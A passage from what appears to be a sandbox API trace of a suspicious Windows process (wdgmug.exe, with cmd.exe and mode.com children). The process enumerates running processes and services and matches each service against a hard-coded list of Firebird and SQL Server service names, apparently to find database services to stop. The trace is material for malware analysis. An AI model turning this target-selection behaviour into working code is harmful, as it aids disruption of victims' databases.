(lpString="SysMain") returned 7 [0304.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0304.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0304.573] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0304.573] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0304.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0304.573] lstrlenW (lpString="SystemEventsBroker") returned 18 [0304.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0304.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0304.573] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0304.573] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0304.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0304.573] lstrlenW (lpString="Themes") returned 6 [0304.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0304.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0304.573] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0304.573] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0304.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0304.573] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0304.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0304.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0304.574] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0304.574] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0304.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0304.574] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0304.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0304.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0304.574] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0304.574] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0304.574] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150720 | out: hHeap=0x470000) returned 1 [0304.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x420 [0304.846] Process32FirstW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.847] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.847] lstrlenW (lpString="System") returned 6 [0304.848] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.848] lstrlenW (lpString="smss.exe") returned 8 [0304.848] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.849] lstrlenW (lpString="csrss.exe") returned 9 [0304.849] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.850] lstrlenW (lpString="wininit.exe") returned 11 [0304.850] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.850] lstrlenW (lpString="csrss.exe") returned 9 [0304.850] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.851] lstrlenW (lpString="winlogon.exe") returned 12 [0304.851] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.852] lstrlenW (lpString="services.exe") returned 12 [0304.852] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.852] lstrlenW (lpString="lsass.exe") returned 9 [0304.852] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0304.853] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0304.853] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0304.853] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0304.853] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.854] lstrlenW (lpString="svchost.exe") returned 11 [0304.854] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.855] lstrlenW (lpString="svchost.exe") returned 11 [0304.855] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.855] lstrlenW (lpString="dwm.exe") returned 7 [0304.856] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.856] lstrlenW (lpString="svchost.exe") returned 11 [0304.856] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.857] lstrlenW (lpString="svchost.exe") returned 11 [0304.857] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.857] lstrlenW (lpString="svchost.exe") returned 11 [0304.857] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.858] lstrlenW (lpString="svchost.exe") returned 11 [0304.858] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.858] lstrlenW (lpString="svchost.exe") returned 11 [0304.859] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.859] lstrlenW (lpString="svchost.exe") returned 11 [0304.859] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.860] lstrlenW (lpString="svchost.exe") returned 11 [0304.860] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.861] lstrlenW (lpString="svchost.exe") returned 11 [0304.861] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.861] lstrlenW (lpString="svchost.exe") returned 11 [0304.861] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.862] lstrlenW (lpString="svchost.exe") returned 11 [0304.862] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.862] lstrlenW (lpString="spoolsv.exe") returned 11 [0304.862] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.863] lstrlenW (lpString="svchost.exe") returned 11 [0304.863] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.863] lstrlenW (lpString="audiodg.exe") returned 11 [0304.864] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0304.864] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0304.864] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0304.865] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0304.865] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0304.865] lstrlenW (lpString="Memory Compression") returned 18 [0304.865] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0304.866] lstrlenW (lpString="sihost.exe") returned 10 [0304.866] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.867] lstrlenW (lpString="svchost.exe") returned 11 [0304.867] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0304.867] lstrlenW (lpString="taskhostw.exe") returned 13 [0304.867] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.868] lstrlenW (lpString="explorer.exe") returned 12 [0304.868] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0304.869] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0304.869] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0304.869] lstrlenW (lpString="SearchUI.exe") returned 12 [0304.869] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0304.870] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0304.870] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.870] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0304.870] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0304.871] lstrlenW (lpString="wdgmug.exe") returned 10 [0304.871] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0304.945] lstrlenW (lpString="cmd.exe") returned 7 [0304.945] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0304.946] lstrlenW (lpString="conhost.exe") returned 11 [0304.946] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0304.947] lstrlenW (lpString="mode.com") returned 8 [0304.947] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0304.947] CloseHandle (hObject=0x420) returned 1 [0304.947] Sleep (dwMilliseconds=0x1f4) [0305.607] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a4e0 [0305.607] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0305.608] GetLastError () returned 0xea [0305.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4150d60 [0305.609] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0305.610] CloseServiceHandle (hSCObject=0x401a4e0) returned 1 [0305.610] lstrlenW (lpString="AppXSvc") returned 7 [0305.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0305.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0305.610] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0305.610] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0305.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0305.610] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0305.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0305.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0305.610] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0305.610] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0305.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0305.610] lstrlenW (lpString="Audiosrv") returned 8 [0305.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0305.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0305.611] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0305.611] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0305.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0305.611] lstrlenW (lpString="BFE") returned 3 [0305.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0305.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0305.611] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0305.611] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0305.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0305.611] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0305.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0305.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0305.611] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0305.611] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0305.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0305.611] lstrlenW (lpString="CDPSvc") returned 6 [0305.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0305.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0305.611] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0305.611] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0305.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0305.611] lstrlenW (lpString="ClickToRunSvc") returned 13 [0305.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0305.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0305.612] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0305.612] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0305.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0305.612] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0305.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0305.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0305.612] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0305.612] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0305.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0305.612] lstrlenW (lpString="CryptSvc") returned 8 [0305.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0305.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0305.612] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0305.612] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0305.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0305.612] lstrlenW (lpString="DcomLaunch") returned 10 [0305.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0305.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0305.612] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0305.612] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0305.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0305.612] lstrlenW (lpString="DeviceAssociationService") returned 24 [0305.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0305.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0305.612] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0305.613] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0305.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0305.613] lstrlenW (lpString="Dhcp") returned 4 [0305.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0305.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0305.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0305.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0305.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0305.613] lstrlenW (lpString="Dnscache") returned 8 [0305.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0305.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0305.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0305.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0305.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0305.613] lstrlenW (lpString="DPS") returned 3 [0305.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0305.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0305.613] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0305.613] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0305.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0305.613] lstrlenW (lpString="DusmSvc") returned 7 [0305.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0305.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 